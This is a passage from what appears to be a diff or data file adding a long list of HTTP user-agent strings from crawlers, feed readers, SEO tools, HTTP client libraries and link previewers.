+Python-httplib2/0.9.2 (gzip) +Java/1.7.0_151 +Ruby, Java/1.8.0_73 +HttpClient\/4.5.3 (Java\/1.8.0_212)"]" +Google-HTTP-Java-Client/1.26.0-SNAPSHOT (gzip) AppEngine-Google; (+http://code.google.com/appengine; appid: s~drive-slack) +Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html) +AdsTxtCrawler/1.0.2 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3694.0 Mobile Safari/537.36 Chrome-Lighthouse +WinHTTP/1.1 +Mozilla/5.0 (compatible; Qwantify/Bleriot/1.1; +https://help.qwant.com/bot) +Iframely/1.3.1 (+https://iframely.com/docs/about) +curl/7.64.0 +curl/7.64.1 +Iframely/0.8.6 (+http://iframely.com/;) +okhttp/3.12.0 +okhttp/3.12.2 +LWP::Simple/6.31 libwww-perl/6.31 +SimplePie/1.3 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20130306173748 +Mozilla/5.0 (compatible; WebCorp/5.1; +http://www.webcorp.org.uk) +Feedly/1.0 (+http://www.feedly.com/fetcher.html; 50 subscribers; like FeedFetcher-Google) +Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.4.4; XT1034 Build/KXB21.14-L1.61) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36 PTST/170721.190705 +GoogleAssociationService +Mozilla/5.0 (compatible; startmebot/1.0; +https://start.me/bot) +Apache-HttpAsyncClient/4.1.4 (Java/1.8.0_202) +Screaming Frog SEO Spider/11.3 +PostmanRuntime/7.15.2 +Apache-HttpClient/4.5.5 (Java/1.8.0_212) +okhttp/3.14.2 +Microsoft-WebDAV-MiniRedir/10.0.18362 +Feedly/1.0 (+http://www.feedly.com/fetcher.html; 49 subscribers; like FeedFetcher-Google) +GuzzleHttp/6.2.1 curl/7.37.0 PHP/5.6.11 +Java/1.8.0_202 +Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; https://www.jobboerse.com/bot.htm) Gecko/20100401 Firefox/24.0 +Mozilla/5.0 (compatible; Cocolyzebot/1.0; https://cocolyze.com/bot) +HubSpot Connect 2.0 (http://dev.hubspot.com/) - contentfilemanagerapiweb-web +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/606.1 (KHTML, like Gecko) JavaFX/8.0 Safari/606.1 +Camo Asset Proxy 2.5.0 +okhttp/3.12.1 +Netvibes (crawler; http://www.netvibes.com) +axios/0.19.0 +SimplePie/1.4-dev (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20190618044202 +SimplePie/1.4-dev (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20190618044608 +Feedly/1.0 (+http://www.feedly.com/fetcher.html; 7 subscribers; like FeedFetcher-Google) +python-requests/2.2.1 CPython/2.7.6 Linux/3.19.0-80-generic +AppEngine-Google; (+http://code.google.com/appengine; appid: s~cacheddocs) +Quora-Bot/1.0 (http://www.quora.com) +Camo Asset Proxy 2.1.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/61.0.3163.100 Chrome/61.0.3163.100 Safari/537.36 PingdomPageSpeed/1.0 (pingbot/2.0; +http://www.pingdom.com/) +Mozilla/5.0 (compatible; MetaJobBot; http://www.metajob.de/crawler) +Mozilla/5.0 (X11; Linux x86_64; GTmetrix https://gtmetrix.com/) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 +Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) +Mozilla/5.0 (compatible; HubSpot Crawler; web-crawlers@hubspot.com) +Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/) +Microsoft-WebDAV-MiniRedir/10.0.17763 +python-requests/2.9.2 +Bloglovin/1.0 (http://www.bloglovin.com; +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/537.36 (KHTML, like Gecko, Google-Publisher-Plugin) Chrome/27.0.1453 Safari/537.36 +okhttp/3.13.1 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 (Refindbot/1.0) +Mozilla/5.0/Nutch-1.1 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.13) +Java/1.8.0_222 +Alignabot 1.0 (https://www.alignable.com/) +IrssiUrlLog/0.2 +SimplePie/1.4-dev (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20190618044500 +Java/1.6.0_16 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) SitemapProbe +OSSProxy 1.3.338.311 (Build 338.311 Win32 en-us)(Mar 5 2019 12:33:55) +Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/) +Java 1.7 Apache HttpClient (Linux x86_64) / GnowitNewsbot / Contact information at http://www.gnowit.com +serpstatbot/1.0 (advanced backlink tracking bot; curl/7.58.0; http://serpstatbot.com/; abuse@serpstatbot.com) +Python/3.7 aiohttp/3.5.4 +Hatena-Favicon/2 (http://www.hatena.ne.jp/faq/) +HuaweiSymantecSpider/1.0+DSE-support@huaweisymantec.com+(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR ; http://www.huaweisymantec.com/en/IRL/spider) +Quora-Bot +Screaming Frog SEO Spider/11.0 +Mozilla/5.0 (compatible; adscanner/)/1.0 (Mozilla/5.0 (compatible; seoscanners.net/1.0; +spider@seoscanners.net); http://seoscanners.net; spider@seoscanners.net) +Goose/3.1.6 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 PTST/190808.190823 +Apache-HttpAsyncClient/4.1.4 (Java/1.8.0_144) +Mozilla/5.0 (compatible; MSIE or Firefox mutant; not on Windows server;) Daumoa-image/1.0 +Mozilla/5.0 (compatible; LetsearchBot/1.0; +https://letsearch.ru/bots) +Mozilla/5.0 (Windows; rv:49.0) Gecko/20100101 Firefox/49.0 +Mozilla/5.0 (compatible; Feedspot/1.0 (+https://www.feedspot.com/fs/fetcher; like FeedFetcher-Google) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/55.0 BrandVerity/1.0 (http://www.brandverity.com/why-is-brandverity-visiting-me) +Jersey/2.25.1 (HttpUrlConnection 1.8.0_152) +FDM/5.1.38.7312 +Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/537.4 (KHTML, like Gecko; Google Page Speed Insights) Version/6.0 Mobile/10A525 Safari/8536.25 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/60.0.3095.0 Safari/537.36 SeoSiteCheckup (https://seositecheckup.com) +Mozilla/4.7 (compatible; OffByOne; Windows 98) Webster Pro V3.2 +Scrapy/1.7.3 (+https://scrapy.org) +BoardReader Favicon Fetcher /1.0 info@boardreader.com +GreatNews/1.0 +Java1.0.21.0 +MagpieRSS/0.7x (+http://magpierss.sf.net) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 6.0.1; SM-G532G ) U2/1.0.0 Mobile +GuzzleHttp/6.3.3 curl/7.61.0 PHP/7.2.9 +GuzzleHttp/6.3.3 curl/7.65.1 PHP/7.3.6 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon,gzip(gfe) +curl/7.65.3 +facebookexternalhit/1.1 (compatible; Blueno/1.0; +http://naver.me/scrap) +WhatsApp/2.19.230 A +Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) +Mozilla/5.0 (compatible; YandexTurbo/1.0; +http://yandex.com/bots) +Mozilla/5.0 (Windows; chromeframe/2.0.0.0) AppleWebKit/1.0 (KHTML, like Gecko) Bromium Safari/1.0 +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64 +google.com +ShortLinkTranslate +python-requests/2.3.0 CPython/2.7.12 Linux/ AppEngine-Google; (+http://code.google.com/appengine; appid: s~ircrestapi) +AppEngine-Google; (+http://code.google.com/appengine; appid: s~ircrestapi) +Google Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 +MaxPointCrawler/Nutch-1.14 (maxpoint.crawler at maxpointinteractive dot com) +Mozilla/5.0 (X11; Linux x86_64; rv:68.0) adbeat.com/policy Gecko/20100101 Firefox/68.0 +eCatch/3.0 +Apache-HttpClient/4.5.7 (Java/1.8.0_211) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 PTST/19.04 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Google-Shopping-Quality +http://www.google.com/merchants/tos/extend/RU/tos.html) +fuelbot +Scrapy/1.7.2 (+https://scrapy.org) +WhatsApp/2.19.90 i +Apache-HttpClient/4.5.3 (Java/1.8.0_212) +WhatsApp Bot 2.18 +Mozilla/5.0 (Java) outbrain +SerendeputyBot/0.8.6 (http://serendeputy.com/about/serendeputy-bot) +Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 AppEngine-Google; (+http://code.google.com/appengine; appid: s~trytrythy-07) +DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html) +WhatsApp/2.19.244 A +ArchiveTeam ArchiveBot/20190617.01 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +node-superagent/3.8.3 +Python/3.7 aiohttp/3.6.0 +AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Apache-HttpClient/4.5.5 (Java/1.7.0_51) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 +WhatsApp/2.19.92 i +okhttp/3.12.3 +okhttp/4.1.0 +WhatsApp/2.19.258 A +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 +Mozilla/5.0 (compatible; bnf.fr_bot; +https://www.bnf.fr/fr/capture-de-votre-site-web-par-le-robot-de-la-bnf) +NewsBlur Page Fetcher - 3 subscribers - http://www.newsblur.com/site/6383570/blog-about-skype (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3) +MetaInspector/5.6.0 (+https://github.com/jaimeiniesta/metainspector) +curl/7.66.0 +Mozilla/5.0 (compatible; YandexVideoParser/1.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 +(compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Java/1.8.0_221 +Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko; Google Page Speed Insights) Version/6.0 Mobile/10A525 Safari/8536.25 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X; %lang2%) adbeat.com/policy AppleWebKit/600.1.4 (KHTML, like Gecko) Version/9.0 Mobile/12A366 Safari/600.1.4 +WhatsApp/0.3.4679 N +NewsBlur Favicon Fetcher - 3 subscribers - http://www.newsblur.com/site/6383570/blog-about-skype (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3) +everyfeed-spider/2.0 (http://www.everyfeed.com) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +$ua = 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; +Tiny Tiny RSS/17.4 (a6990df) (http://tt-rss.org/) +Mozilla/5.0 (compatible; adscanner/)/1.1 (http://seocompany.store; spider@seocompany.store) +Apache-HttpClient/4.5.9 (Java/1.8.0_222) +HTTPing v2.5 +Microsoft-WebDAV-MiniRedir/6.0.6000 +Mozilla/5.0 (compatible; adscanner/)/1.0 (http://seocompany.store; spider@seocompany.store) +newspaper/0.2.6 +Shockwave Flash +SimplePie/1.4-dev (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20190618044051 +Screaming Frog SEO Spider/11.1 +WhatsApp/2.19.274 A +AwarioSmartBot/1.0 (+https://awario.com/bots.html; bots@awario.com) +Java/1.8.0_192 +1st ZipCommander (Net) - http://www.zipcommander.com/ +Mozilla/5.0 (compatible; YandexRCA/1.0; +http://yandex.com/bots) +Mozilla/5.0 (compatible; LinkpadBot/2.3; +http://linkpad.org/robot/) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/602.1 (KHTML, like Gecko) splash Version/10.0 Safari/602.1 +Mozilla/5.0 (compatible; heritrix/3.3.0 +http://www.bne.es/es/Colecciones/ArchivoWeb/AvisoWebmasters/index.html) +Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) adbeat.com/policy AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1 +okhttp/3.14.0 +WhatsApp/2.19.100 i +Python/3.7 aiohttp/3.6.2 +Apache-HttpAsyncClient/4.1.2 (Java/1.8.0_202) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 DuckDuckGo/7 +Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; SBooksNet/1.0; +http://s-books.net/crawl_policy) +Java/11.0.4 +curl/7.62.0 +WhatsApp/2.19.291 A +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 SeoSiteCheckup (https://seositecheckup.com) + +Pearltrees +Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp) +Python/3.5 aiohttp/2.3.10 +Screaming Frog SEO Spider/12.0 +Traackr.com +WhatsApp/0.3.5149 N +Python/3.6 aiohttp/1.0.5 +Mozilla/5.0 (compatible; Linespider/1.1; +https://lin.ee/4dwXkTH) +PostmanRuntime/7.19.0 +Apache-HttpClient/4.5.10 (Java/11.0.4) +PageFreezer (pagefreezer crawler; http://pagefreezer.com/pagefreezer-crawler/; info@pagefreezer.com) +Mozilla/5.0 (compatible;Impact Radius Compliance Bot) +PageFreezer +Java/1.8.0_232 +Screaming Frog SEO Spider/12.1 +WhatsApp/2.19.308 A +Python/3.6 aiohttp/3.4.1 +WhatsApp/2.19.112 i +HTTPie/0.9.8 +HttpClient +HubSpot Connect 2.0 (http://dev.hubspot.com/) - contentfilemanagerapiwebinternal-web +User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) +Mozilla/5.0 (compatible; wmtips.com/2.0; +http://www.wmtips.com/tools/) +okhttp/3.12.6 +PHP +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/606.1 (KHTML, like Gecko) JavaFX/8.0 Safari/606.1 +python-requests +AppEngine-Google; (+http://code.google.com/appengine; appid: s~repcore-demo) +Python/3.6 aiohttp/3.6.2 +bitdiscovery +Java/1.8.0_231 +pilicanbot/Nutch-1.16 (pilican.com; bot@pilican.com) +Mozilla/5.0 (compatible; Cliqzbot/3.0; +http://cliqz.com/company/cliqzbot) +Screaming Frog SEO Spider/12.2 +ArchiveTeam ArchiveBot/20190825.7691ba8 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Mozilla/5.0 (compatible; MojeekBot/0.7; +https://www.mojeek.com/bot.html) +SeobilityBot (SEO Tool; https://www.seobility.net/sites/bot.html) +WhatsApp/2.19.330 A +PHP/{5|6|7}.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0} +mozilla/5.0 (compatible; hubspot crawler; web-crawlers@hubspot.com; +@operator_contact_url@) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.4.1.el7.x86_64 +curl/7.67.0 +Scrapy/1.8.0 (+https://scrapy.org) +WhatsApp/2.19.334 A +Microsoft-WebDAV-MiniRedir/10.0.18363 +Visicom Toolbar +WhatsApp/2.19.341 A +NokiaC3-00/5.0 (08.71) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; vi; NokiaC3-00) U2/1.0.0 UCBrowser/9.5.0.449 U2/1.0.0 Mobile UNTRUSTED/1.0 +GuzzleHttp/6.3.3 curl/7.52.1 PHP/7.3.11-1+0~20191026.48+debian9~1.gbpf71ca0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.6.8.732 (SpeedMode; Proxy; Android 5.1; S4T ) U2/1.0.0 Mobile +OnPageBot (compatible; Googlebot 2.1; +https://bot.onpage.org/) +WhatsApp/0.3.9308 N +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) adbeat.com/policy AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 +WhatsApp/2.19.120 i +Apache-HttpClient/4.5.2 (Java/1.7.0_231) +Masscan/1.0 +facebookexternalhit/1.1; Mozilla/5.0 (compatible; WorksOgCrawler/1.0.0;) +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11A465 Twitter for iPhone BrandVerity/1.0 (http://www.brandverity.com/why-is-brandverity-visiting-me) +libwww-perl/6.43 +Mozilla/5.0 (compatible; theoldreader.com; 2 subscribers; feed-id=76e7d00fb50d9adec104b9e4) +okhttp/2.7.0 +Python-urllib/3.8 +Mozilla/4.0 (Windows 10 10.0) Java/1.8.0_66 +Python-urllib/2.7 AppEngine-Google; (+http://code.google.com/appengine; appid: s~isitdownforjustme) +Screaming Frog SEO Spider/12.3 +Mozilla/4.0 (Windows 10 10.0) Java/1.8.0_152 +WhatWeb/0.5.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 Chrome-Lighthouse +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Mobile Safari/537.36 Chrome-Lighthouse +WhatsApp/2.19.352 A +Apache-HttpClient/4.1.1 (java 1.5) +PostmanRuntime/7.20.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 +bot +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/606.1 (KHTML, like Gecko) JavaFX/8.0 Safari/606.1 +Python/3.8 aiohttp/3.6.2 +Python/3.7 aiohttp/3.0.9 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~goagentproxy22) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 +selenium/3.141.59 (java windows) +GuzzleHttp/6.3.3 curl/7.61.1 PHP/7.1.30 +WhatsApp/2.19.360 A +Transmission/2.94 +DuckDuckGo/5 +Feedreader 3.xx (Powered by Newsbrain) +WhatsApp/2.19.130 A +WhatsApp/2.19.121 i +Mechanize/2.7.6 Ruby/2.6.5p114 (http://github.com/sparklemotion/mechanize/) +WordPress.com; https://km4nmp.com +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.9.1.el7.x86_64 +AddThis.com (http://support.addthis.com/) +Tiny Tiny RSS/UNKNOWN (Unsupported) (http://tt-rss.org/) +Java/1.8.0_221-snc2 +WhatsApp/0.3.9309 N +GuzzleHttp/6.3.3 curl/7.35.0 PHP/7.0.2-4+deb.sury.org~trusty+1 +Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0;+http://www.cloudflare.com/always-online) +WordPress.com; https://agloeco.wordpress.com +Curl/PHP 5.6.40 (http://github.com/shuber/curl) +okhttp/3.12.5 +ArchiveTeam ArchiveBot/20191207.38f77ff (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Screaming Frog SEO Spider/12.4 +WhatsApp/2.19.362 A +WordPress/5.3.2; http://159.69.72.230 +DocBase Crawler/1.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER) +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E) +cURL 7.19.2 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Googlebot-Mobile/2.1; +http://www.google.com/bot.html +WordPress.com; https://developercookie.wordpress.com +WhatsApp/2.19.124 i +snap +Mozilla/5.0 (compatible; WebBot/1.0) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 +Acoon v4.10.1 (www.acoon.de) +Dispatch/0.13.2-SNAPSHOT +okhttp/2.7.5 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot +Mozilla/5.0 (compatible; EchoboxBot/1.0; hash/w4mwnpbXf3MFAbxOkJRw; +http://www.echobox.com) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1526867131-0" +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/602.1 (KHTML, like Gecko) splash Version/10.0 Safari/602.1 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | en,* +SimplePie/1.5 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20191223190533 +Mozilla/5.0 (compatible; Mappy/1.0; Warning:UserAgent will be changed by Feb 2020; +http://mappydata.net/bot/) +Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) +python-requests/2.6.0 +Apache-HttpClient/4.5.9 (Java/1.8.0_201) +Apache-HttpClient/4.5.9 (Java/1.8.0_232) +MAZBot/1.0 (http://mazdigital.com) +curl/7.68.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +WhatsApp/2.20.10 i +WordPress/5.3.2; https://c-punkt.org +Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 +WordPress/5.3.2; https://et-code.ru +Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X; %lang2%) adbeat.com/policy AppleWebKit/534.46 (KHTML, like Gecko) Version/8.0 Mobile/9A334 Safari/7534.48.3 +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.44 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 +WhatsApp/0.4.315 N +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-327.el7.x86_64 +okhttp/4.3.1 +okhttp/4.2.2 +PostmanRuntime/7.22.0 +WordPress/5.2.5; https://cluster-shop.ru +WordPress/5.3.2; https://svadba-narofominsk.ru +Apache-HttpClient/4.5.6 (Java/1.8.0_232) +NokiaC3-00/5.0 (08.71) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; id; NokiaC3-00) U2/1.0.0 UCBrowser/9.5.0.449 U2/1.0.0 Mobile UNTRUSTED/1.0 +WhatsApp/2.20.11 i +Feedly/1.0 (+http://www.feedly.com/fetcher.html; 12 subscribers; like FeedFetcher-Google) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.120 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.20.11 A +WhatsApp/2.20.14 A +WordPress/5.3.2; http://pirogosi.ru +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/79.0.3945.120 Mobile Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/79.0.3945.120 Safari/537.36 +WeSEE:Search/0.1 (Alpha, http://www.wesee.com/bot/) +PHP/5.2.18 +PHP/5.2.93 +PHP/5.3.71 +PHP/5.3.81 +PHP/5.3.44 +PHP/5.3.98 +PHP/5.3.64 +PHP/5.2.11 +PHP/5.2.28 +PHP/5.3.41 +PHP/5.3.14 +PHP/5.3.05 +Atomic_Email_Hunter/4.0 +Barkrowler/0.9 (+https://babbar.tech/crawler) +WhatsApp/2.20.16 A +axios/0.19.1 + UnChaos From Chaos To Order Hybrid Web Search Engine.(vadim_gonchar@unchaos.com) +NokiaC3-00/5.0 (08.65) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; en-US; nokiac3-00) U2/1.0.0 UCBrowser/8.9.0.251 U2/1.0.0 Mobile UNTRUSTED/1.0 +Mozilla/5.0 (compatible; Googlebot/2.1; https://deepcrawl.com/bot) +GuzzleHttp/6.5.1 curl/7.47.0 PHP/7.2.22-1+ubuntu16.04.1+deb.sury.org+1 +WhatsApp/2.20.5 A +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/79.0.3945.120 Safari/537.36 +Apache-HttpClient/4.5.8 (Java/11.0.6) +Mozilla/5.0 (compatible; SemrushBot; +http://www.semrush.com/bot.html) +WordPress/5.2.5; https://vautomation.dev +Doximity-Diffbot +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/98 Safari/537.4 (StatusCake) +Mozilla/5.0 (compatible; heritrix/3.3.0 +https://www.kb.se/hitta-och-bestall/hitta-i-samlingarna/kulturarw3.html) +Mozilla/5.0 (compatible; Semanticbot/1.0; +http://sempi.tech/bot.html) +Windows-RSS-Platform/2.0 (MSIE 8.0; Windows NT 5.1) +AhrefsBot +Java/1.8.0_242 +WhatsApp/2.20.20 i +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.99 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/0.4.316 N +WordPress/5.3.2; https://instagram-reklama.ru +WhatsApp/2.20.27 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 +WhatsApp/2.20.21 i +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 AppEngine-Google; (+http://code.google.com/appengine; appid: s~awaaat5) +WhatsApp/0.4.612 N +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 PTST/200207.150212 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 PTST/200207.180243 +Mozilla/5.0 (Windows; chromeframe/2.4.8.5746) AppleWebKit/1.0 (KHTML, like Gecko) Bromium Safari/1.0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/200207.180243 +WordPress/5.3.2; https://lapki-tapki.ru +WordPress/5.3.2; https://wpbuffs.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 